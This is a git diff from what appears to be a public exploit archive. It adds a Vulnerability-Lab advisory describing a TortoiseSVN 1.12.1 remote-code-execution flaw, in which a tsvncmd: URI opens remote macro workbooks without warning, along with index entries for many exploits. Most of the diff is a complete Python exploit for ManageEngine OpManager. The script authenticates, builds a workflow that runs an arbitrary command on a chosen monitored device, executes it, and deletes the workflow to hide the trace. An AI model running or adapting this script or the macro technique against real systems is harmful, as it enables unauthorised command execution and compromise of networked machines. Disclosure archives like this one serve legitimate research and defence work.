+It is based on Apache Subversion (SVN); TortoiseSVN provides a nice and
+easy user interface for Subversion.
+It is developed under the GPL. Which means it is completely free for
+anyone to use, including in a commercial
+environment, without any restriction. The source code is also freely
+available, so you can even develop your
+own version if you wish to. Since it's not an integration for a specific
+IDE like Visual Studio, Eclipse or
+others, you can use it with whatever development tools you like, and
+with any type of file.
+
+(Copy of the about page: https://tortoisesvn.net/about.html )
+
+
+Abstract Advisory Information:
+==============================
+A vulnerability laboratory researcher (vxrl team) discovered a remote
+code execution vulnerability in the TortoiseSVN v1.12.1 software.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2019-08-13: Public Disclosure (Vulnerability Laboratory)
+
+Affected Product(s):
+====================
+TortoiseSVN
+Product: TortoiseSVN - Software 1.12.1
+
+
+Discovery Status:
+=================
+Published
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Authentication Type:
+====================
+Pre auth - no privileges
+
+
+User Interaction:
+=================
+Low User Interaction
+
+
+Disclosure Type:
+================
+Independent Security Research
+
+
+Technical Details & Description:
+================================
+A remote code execution vulnerability has been uncovered in the official
+TortoiseSVN v1.12.1 software.
+The vulnerability typ allows remote attackers to execute arbitrary codes
+to compromise a target computer system.
+
+The URI handler of TortoiseSVN (Tsvncmd:) allows a customised diff
+operation on Excel workbooks, which could be used to open remote
+workbooks without protection from macro security settings to execute
+arbitrary code.
+
+The `tsvncmd:command:diff?path:[file1]?path2:[file2]` will execute a
+customised diff on [file1] and [file2] based on the file extension.
+For xls files, it will execute the script `diff-xls.js` using wscript,
+which will open the two files for analysis without any macro
+security warning. An attacker can exploit this by putting a macro virus
+in a network drive, and force the victim to open the workbooks
+and execute the macro inside. Since the macro is triggered through
+wscript, to make the attack less visible, one could kill the wscript
+process and quit the excel program after the code was executed.
+
+
+Proof of Concept (PoC):
+=======================
+The vulnerability could be triggered by visiting a specially crafted URL
+via web browser.
+To reproduce the vulnerability, one could simply create a .url file or
+open the URL with a browsers,
+but a notification prompt may be shown for the latter case.
+
+Checkout
+the Repo with TortoiseSVN
+
+where VBoxSvrv is the remote network drive controlled by the attacker,
+v.xlsm is the macro virus and w.xlsx is just an empty excel workbook.
+
+Sources: https://www.vulnerability-lab.com/resources/documents/2188.rar
+Password: 23vxrl23
+
+PoC: Video
+https://www.youtube.com/watch?v=spvRSC377vI
+
+
+Security Risk:
+==============
+The security risk of the remote code execution vulnerability in the
+software component is estimated as high.
+
+
+Credits & Authors:
+==================
+PingFanZettaKe [VXRL Team] -
+https://www.vulnerability-lab.com/show.php?user=PingFanZettaKe
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without
+any warranty. Vulnerability Lab disclaims all warranties,
+either expressed or implied, including the warranties of merchantability
+and capability for a particular purpose. Vulnerability-Lab
+or its suppliers are not liable in any case of damage, including direct,
+indirect, incidental, consequential loss of business profits
+or special damages, even if Vulnerability-Lab or its suppliers have been
+advised of the possibility of such damages. Some states do
+not allow the exclusion or limitation of liability for consequential or
+incidental damages so the foregoing limitation may not apply.
+We do not approve or encourage anybody to break any licenses, policies,
+deface websites, hack into databases or trade with stolen data.
+
+Domains: www.vulnerability-lab.com www.vuln-lab.com
+www.vulnerability-db.com
+Services: magazine.vulnerability-lab.com
+paste.vulnerability-db.com infosec.vulnerability-db.com
+Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
+youtube.com/user/vulnerability0lab
+Feeds: vulnerability-lab.com/rss/rss.php
+vulnerability-lab.com/rss/rss_upcoming.php
+vulnerability-lab.com/rss/rss_news.php
+Programs: vulnerability-lab.com/submit.php
+vulnerability-lab.com/register.php
+vulnerability-lab.com/list-of-bug-bounty-programs.php
\ No newline at end of file
diff --git a/exploits/windows/webapps/47255.py b/exploits/windows/webapps/47255.py
new file mode 100755
index 000000000..3615a7ba5
--- /dev/null
+++ b/exploits/windows/webapps/47255.py
@@ -0,0 +1,266 @@ +#!/usr/bin/env python3 + +# Exploit Title: ManageEngine opManager Authenticated Code Execution +# Google Dork: N/A +# Date: 08/13/2019 +# Exploit Author: @kindredsec +# Vendor Homepage: https://www.manageengine.com/ +# Software Link: https://www.manageengine.com/network-monitoring/download.html +# Version: 12.3.150 +# Tested on: Windows Server 2016 +# CVE: N/A + +import requests +import re +import random +import sys +import json +import string +import argparse + +C_WHITE = '\033[1;37m' +C_BLUE = '\033[1;34m' +C_GREEN = '\033[1;32m' +C_YELLOW = '\033[1;33m' +C_RED = '\033[1;31m' +C_RESET = '\033[0m' +LOGIN_FAIL_MSG = "Invalid username and/or password." + +def buildRandomString(length=10): + letters = string.ascii_lowercase + return ''.join(random.choice(letters) for i in range(length)) + + +def getSessionData(target, user, password): + + session = requests.Session() + session.get(target) + + # Login Sequence + randSid = random.uniform(-1,1) + getParams = { "requestType" : "AJAX" , "sid" : str(randSid) } + postData = { "eraseAutoLoginCookie" : "true" } + session.post( url = target + "/servlets/SettingsServlet", data = postData, params = getParams ) + + postData = { "loginFromCookieData" : "false", + "ntlmv2" : "false", + "j_username" : user, + "j_password" : password + } + initialAuth = session.post( url = target + "/j_security_check", data = postData ) + + + if LOGIN_FAIL_MSG in initialAuth.text: + + print(f"{C_RED}[-]{C_RESET} Invalid credentials specified! 
Could not login to OpManager.") + sys.exit(1) + + elif initialAuth.status_code != 200: + print(f"{C_RED}[-]{C_RESET} An Unknown Error has occurred during the authentication process.") + sys.exit(1) + + apiKeyReg = re.search(".*\.apiKey = .*;", initialAuth.text) + apiKey = apiKeyReg.group(0).split('"')[1] + + return { "session" : session , "apiKey" : apiKey } + + + + +def getDeviceList(target, session, apiKey): + + deviceList = session.get( target + "/api/json/v2/device/listDevices" , params = { "apiKey" : apiKey } ) + + devices = {} + devicesJsonParsed = json.loads(deviceList.text) + for row in devicesJsonParsed["rows"]: + devices[row["deviceName"]] = [ row["ipaddress"], row["type"] ] + + return devices + + + +def buildTaskWindows(target, session, apiKey, device, command): + + # Build Task + taskName = buildRandomString() + workFlowName = buildRandomString(15) + + jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" + jsonData += '"' + taskName + '"' + jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"cmd.exe /c ${FileName}.bat ${DeviceName} ${UserName} ${Password} arg1","scriptBody":""" + jsonData += '"' + command + '"' + jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" + jsonData += '"' + workFlowName + '"' + jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" + jsonData += '"' + device + '"' + jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" + jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" + jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" + + 
makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) + + if "has been created successfully" in makeWorkFlow.text: + print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") + else: + print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . .") + sys.exit(1) + + return workFlowName + + +def buildTaskLinux(target, session, apiKey, device, command): + + taskName = buildRandomString() + workFlowName = buildRandomString(15) + + jsonData = """{"taskProps":{"mainTask":{"taskID":9,"dialogId":3,"name":""" + jsonData += '"' + taskName + '"' + jsonData += ""","deviceDisplayName":"${DeviceName}","cmdLine":"sh ${FileName} ${DeviceName} arg1","scriptBody":""" + jsonData += '"' + command + '"' + jsonData += ""","workingDir":"${UserHomeDir}","timeout":"60","associationID":-1,"x":41,"y":132},"name":"Untitled","description":""},"triggerProps":{"workflowDetails":{"wfID":"","wfName":""" + jsonData += '"' + workFlowName + '"' + jsonData += ""","wfDescription":"Thnx for Exec","triggerType":"0"},"selectedDevices":[""" + jsonData += '"' + device + '"' + jsonData += """],"scheduleDetails":{"schedType":"1","selTab":"1","onceDate":"2999-08-14","onceHour":"0","onceMin":"0","dailyHour":"0","dailyMin":"0","dailyStartDate":"2019-08-14","weeklyDay":[],"wee""" + jsonData += """klyHour":"0","weeklyMin":"0","monthlyType":"5","monthlyWeekNum":"1","monthlyDay":["1"],"monthlyHour":"0","monthlyMin":"0","yearlyMonth":["0"],"yearlyDate":"1","yearlyHour":"0","y""" + jsonData += """earlyMin":"0"},"criteriaDetails":{}}}""" + + makeWorkFlow = session.post(url = target + "/api/json/workflow/addWorkflow", params = { "apiKey" : apiKey }, data = { "jsonData" : jsonData }) + + if "has been created successfully" in makeWorkFlow.text: + print(f"{C_GREEN}[+]{C_RESET} Successfully created Workflow") + else: + print(f"{C_RED}[-]{C_RESET} Issues creating workflow. Exiting . . 
.") + sys.exit(1) + + return workFlowName + + +# Get the ID of the newly created workflow +def getWorkflowID(target, session, apiKey, workflowName): + + getID = session.get(url = target + "/api/json/workflow/getWorkflowList", params = { "apiKey" : apiKey }) + + rbID = -100 + workflowJsonParsed = json.loads(getID.text) + for wf in workflowJsonParsed: + if wf['name'] == workflowName: + rbID = wf['rbID'] + + if rbID == -100: + print(f"{C_RED}[-]{C_RESET} Issue obtaining Workflow ID. Exiting ...") + sys.exit(1) + + return rbID + + +def getDeviceID(target, session, apiKey, rbID, device): + + getDevices = session.get(url = target + "/api/json/workflow/showDevicesForWorkflow", params = { "apiKey" : apiKey , "wfID" : rbID }) + wfDevicesJsonParsed = json.loads(getDevices.text) + wfDevices = wfDevicesJsonParsed["defaultDevices"] + deviceID = list(wfDevices.keys())[0] + + return deviceID + + + +def runWorkflow(target, session, apiKey, rbID, device): + + targetDeviceID = getDeviceID(target, session, apiKey, rbID, device) + + print(f"{C_YELLOW}[!]{C_RESET} Executing Code . . .") + workflowExec = session.post(target + "/api/json/workflow/executeWorkflow", params = { "apiKey" : apiKey }, data = { "wfID" : rbID, "deviceName" : targetDeviceID, "triggerType" : 0 } ) + + if re.match(r"^\[.*\]$", workflowExec.text.strip()): + print(f"{C_GREEN}[+]{C_RESET} Code appears to have run successfully!") + else: + print(f"{C_RED}[-]{C_RESET} Unknown error has occurred. Please try again or run the process manually.") + sys.exit(1) + + deleteWorkflow(target, session, apiKey, rbID) + print(f"{C_GREEN}[+]{C_RESET} Exploit complete!") + + +def deleteWorkflow(target, session, apiKey, rbID): + + print(f"{C_YELLOW}[!]{C_RESET} Cleaning up . . 
.") + delWorkFlow = session.post( target + "/api/json/workflow/deleteWorkflow" , params = { "apiKey" : apiKey, "wfID" : rbID }) + + +def main(): + + parser = argparse.ArgumentParser(description="Utilizes OpManager's Workflow feature to execute commands on any monitored device.") + parser.add_argument("-t", nargs='?', metavar="target", help="The full base URL of the OpManager Instance (Example: http://192.168.1.1)") + parser.add_argument("-u", nargs='?', metavar="user", help="The username of a valid OpManager admin account.") + parser.add_argument("-p", nargs='?', metavar="password", help="The password of a valid OpManager admin account.") + parser.add_argument("-c", nargs='?', metavar="command", help="The command you want to run.") + + args = parser.parse_args() + + insufficient_args = False + if not args.u: + print(f"{C_RED}[-]{C_RESET} Please specify a username with '-t'.") + insufficient_args = True + if not args.t: + print(f"{C_RED}[-]{C_RESET} Please specify a target with '-t'.") + insufficient_args = True + if not args.p: + print(f"{C_RED}[-]{C_RESET} Please specify a password with '-p'.") + insufficient_args = True + if not args.c: + print(f"{C_RED}[-]{C_RESET} Please specify a command with '-c'.") + insufficient_args = True + + if insufficient_args: + sys.exit(1) + + + sessionDat = getSessionData(args.t, args.u, args.p) + session = sessionDat["session"] + apiKey = sessionDat["apiKey"] + + devices = getDeviceList(args.t, session, apiKey) + + # if there's only one device in the OpManager instance, default to running commands on that device; + # no need to ask the user. 
+ if len(devices.keys()) == 1: + device = list(devices.keys())[0] + else: + print(f"{C_YELLOW}[!]{C_RESET} There appears to be multiple Devices within this target OpManager Instance:") + print("") + counter = 1 + for key in devices.keys(): + print(f" {counter}: {key} ({devices[key][0]}) ({devices[key][1]})") + + print("") + while True: + try: + prompt = f"{C_BLUE}[?]{C_RESET} Please specify which Device you want to run your command on: " + devSelect = int(input(prompt)) + except KeyboardInterrupt: + sys.exit(1) + except ValueError: + print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") + sys.exit(1) + + if devSelect < 1 or devSelect > len(list(devices.keys())): + print(f"{C_RED}[-]{C_RESET} Error. Invalid Device number selected. Quitting . . .") + sys.exit(1) + + else: + device = list(devices.keys())[counter - 1] + break + + # don't hate, it works doesn't it? + if "indows" in devices[device][1]: + workflowName = buildTaskWindows(args.t, session, apiKey, device, args.c) + else: + workflowName = buildTaskLinux(args.t, session, apiKey, device, args.c) + + workflowID = getWorkflowID(args.t, session, apiKey, workflowName) + runWorkflow(args.t, session, apiKey, workflowID, device) + + +main() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 67775d97a..57e6a5792 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
@@ -6525,6 +6525,8 @@ id,file,description,date,author,type,platform,port
 47233,exploits/vxworks/dos/47233.py,"VxWorks 6.8 - TCP Urgent Pointer = 0 Integer Underflow",2019-08-12,"Zhou Yu",dos,vxworks,
 47236,exploits/linux/dos/47236.c,"Linux - Use-After-Free Reads in show_numa_stats()",2019-08-12,"Google Security Research",dos,linux,
 47237,exploits/multiple/dos/47237.txt,"WebKit - UXSS via XSLT and Nested Document Replacements",2019-08-12,"Google Security Research",dos,multiple,
+47248,exploits/windows/dos/47248.py,"Windows PowerShell - Unsanitized Filename Command Execution",2019-08-14,hyp3rlinx,dos,windows,
+47254,exploits/linux/dos/47254.txt,"ABC2MTEX 1.6.1 - Command Line Stack Overflow",2019-08-14,"Carter Yagemann",dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -10632,6 +10634,7 @@ id,file,description,date,author,type,platform,port
 47176,exploits/windows/local/47176.cpp,"Microsoft Windows 7 build 7601 (x86) - Local Privilege Escalation",2019-07-26,ShivamTrivedi,local,windows,
 47231,exploits/linux/local/47231.py,"Ghidra (Linux) 9.0.4 - .gar Arbitrary Code Execution",2019-08-12,"Etienne Lacoche",local,linux,
 47238,exploits/windows/local/47238.ps1,"Steam Windows Client - Local Privilege Escalation",2019-08-12,AbsoZed,local,windows,
+47253,exploits/windows/local/47253.cpp,"Microsoft Windows 10 AppXSvc Deployment Service - Arbitrary File Deletion",2019-08-14,"Abdelhamid Naceri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -17606,6 +17609,7 @@ id,file,description,date,author,type,platform,port
 47230,exploits/linux/remote/47230.rb,"Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)",2019-08-12,AkkuS,remote,linux,
 47243,exploits/php/remote/47243.py,"Agent Tesla Botnet - Arbitrary Code Execution",2019-08-13,prsecurity,remote,php,
 47244,exploits/php/remote/47244.py,"AZORult Botnet - SQL Injection",2019-08-13,prsecurity,remote,php,
+47256,exploits/php/remote/47256.rb,"Agent Tesla Botnet - Arbitrary Code Execution (Metasploit)",2019-08-14,"Ege Balci",remote,php,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -41606,3 +41610,11 @@ id,file,description,date,author,type,platform,port
 47225,exploits/php/webapps/47225.txt,"osTicket 1.12 - Formula Injection",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47226,exploits/php/webapps/47226.txt,"osTicket 1.12 - Persistent Cross-Site Scripting",2019-08-12,"Aishwarya Iyer",webapps,php,80
 47232,exploits/php/webapps/47232.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'cities.php' SQL Injection",2019-08-12,qw3rTyTy,webapps,php,80
+47234,exploits/php/webapps/47234.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated Configuration Download",2019-08-12,xerubus,webapps,php,80
+47235,exploits/php/webapps/47235.py,"Mitsubishi Electric smartRTU / INEA ME-RTU - Unauthenticated OS Command Injection Bind Shell",2019-08-12,xerubus,webapps,php,
+47247,exploits/php/webapps/47247.txt,"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting",2019-08-14,"Ilca Lucian Florin",webapps,php,80
+47249,exploits/php/webapps/47249.txt,"Joomla! Component JS Jobs (com_jsjobs) 1.2.5 - 'customfields.php' SQL Injection",2019-08-14,qw3rTyTy,webapps,php,80
+47250,exploits/hardware/webapps/47250.rb,"D-Link DIR-600M - Authentication Bypass (Metasploit)",2019-08-14,"Devendra Singh Solanki",webapps,hardware,80
+47251,exploits/php/webapps/47251.txt,"WordPress Plugin Download Manager 2.5 - Cross-Site Request Forgery",2019-08-14,"Princy Edward",webapps,php,80
+47252,exploits/windows/webapps/47252.txt,"TortoiseSVN 1.12.1 - Remote Code Execution",2019-08-14,Vulnerability-Lab,webapps,windows,
+47255,exploits/windows/webapps/47255.py,"ManageEngine opManager 12.3.150 - Authenticated Code Execution",2019-08-14,kindredsec,webapps,windows,